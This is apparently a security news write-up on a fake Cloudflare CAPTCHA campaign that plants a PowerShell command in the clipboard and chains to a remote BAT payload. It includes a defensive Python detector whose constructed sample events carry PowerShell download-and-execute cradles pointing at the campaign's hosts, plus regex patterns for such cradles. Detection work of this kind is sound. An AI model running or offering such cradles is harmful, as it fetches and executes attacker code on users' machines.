malware distribution via fake Cloudflare screens.

A new social engineering campaign is targeting unsuspecting users with fraudulent Cloudflare verification screens, marking a sophisticated evolution in malware distribution tactics.

This attack method takes advantage of the trusted appearance of legitimate web security services to trick victims into executing malicious code. The campaign begins with a convincing fake CAPTCHA verification page that mimics Cloudflare’s authentic security checks.


When users encounter this deceptive interface, they are prompted to complete what seems like a routine verification process, unknowingly initiating a complex malware installation sequence. Security researchers, including analyst Shaquib Izhar, have flagged this campaign as particularly dangerous due to its advanced evasion techniques.

Upon clicking the “Verify” button, the malicious webpage copies a PowerShell command into the user’s clipboard and records their IP address for reconnaissance. Victims are then prompted to perform a further “verification” step, which is what gets the copied command executed, while the page’s keystroke tracking monitors their actions and reinforces the impression of a legitimate check.


The infection chain is built to stay below the radar. Webhooks embedded in the page report each of the victim’s actions in real time to the attacker’s command and control infrastructure, so the operator knows at which stage every target is.

The PowerShell command retrieves a Base64-encoded payload from pastesio[.]com and then downloads a hardcoded BAT file from axiomsniper[.]info. The BAT file carries anti-analysis checks: if it detects that it is running inside a virtual machine it terminates, which keeps it out of automated sandbox analysis.
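The clipboard write itself happens in the browser and is invisible to endpoint telemetry, so the practical detection point is the next stage described above: an interpreter launched from the Run dialog or Explorer that pulls code from the network. The following Python is an added example, not code from the article or from the researchers it cites; it scores constructed Sysmon-style process-creation events against that pattern, decodes `-EncodedCommand` blobs (Base64 over UTF-16LE) before scanning them, and matches the two hosts the article names. The assumption that the pasted command runs with `explorer.exe` as its parent, the field names, and all sample events are constructed for illustration.

```python
import base64
import re

# Hosts named in the article; nothing else in this list comes from the report.
ARTICLE_HOSTS = ("pastesio.com", "axiomsniper.info")

# Assumption: a command pasted into Win+R or the Explorer address bar is
# executed with explorer.exe as the parent process.
RUN_DIALOG_PARENTS = ("explorer.exe",)
INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")

PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "no_profile": re.compile(r"-no(?:p|profile)\b", re.I),
    "download_cradle": re.compile(
        r"\b(?:iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest"
        r"|downloadstring|downloadfile|start-bitstransfer)\b", re.I),
}
# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(b64: str) -> str:
    """PowerShell's -EncodedCommand is Base64 over UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> list[str]:
    """Return the names of the indicators an event triggers (empty if none)."""
    hits = []
    if _basename(event.get("Image", "")) not in INTERPRETERS:
        return hits
    if _basename(event.get("ParentImage", "")) in RUN_DIALOG_PARENTS:
        hits.append("launched_from_explorer")
    text = event.get("CommandLine", "")
    m = ENCODED.search(text)
    if m:
        hits.append("encoded_command")
        try:
            # Scan the decoded script too, so an encoded cradle is not missed.
            text += " " + decode_encoded_command(m.group(1))
        except (ValueError, UnicodeDecodeError):
            hits.append("undecodable_encoded_command")
    for name, rx in PATTERNS.items():
        if rx.search(text):
            hits.append(name)
    lowered = text.lower()
    hits.extend(f"ioc_host:{h}" for h in ARTICLE_HOSTS if h in lowered)
    return hits


def is_clickfix_candidate(event: dict) -> bool:
    """Explorer-launched interpreter that fetches code from the network."""
    hits = score_event(event)
    return "launched_from_explorer" in hits and (
        "download_cradle" in hits or any(h.startswith("ioc_host:") for h in hits))


# Constructed second-stage command and its -EncodedCommand form (not from the campaign).
DECODED_STAGE = ("IEX (New-Object Net.WebClient).DownloadString("
                 "'https://axiomsniper.info/constructed-stage.bat')")
SAMPLE_ENCODED = base64.b64encode(DECODED_STAGE.encode("utf-16-le")).decode()

# Constructed Sysmon-style process-creation events, not real telemetry.
SAMPLE_EVENTS = [
    {   # pasted into Win+R: hidden window, in-memory cradle, paste-site host
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -c "iex (irm https://pastesio.com/raw/constructed-id)"',
    },
    {   # same chain, but the cradle is hidden behind -EncodedCommand
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": f"powershell -nop -w hidden -enc {SAMPLE_ENCODED}",
    },
    {   # a user opening PowerShell from the Start menu: explorer parent, no cradle
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    },
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(is_clickfix_candidate(ev), score_event(ev))
```

The parent-process condition is what keeps the rule from firing on ordinary interactive PowerShell use (the third event is flagged on nothing but its parent and is not a candidate), while decoding the encoded form is what stops a trivial `-enc` wrapper from hiding the cradle and the article’s hosts from string matching.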

At the time of the report, the BAT file had zero detections across VirusTotal scanners, underscoring how well the campaign evades signature-based detection and why behavioral analysis of process activity, rather than file reputation alone, is needed to catch it.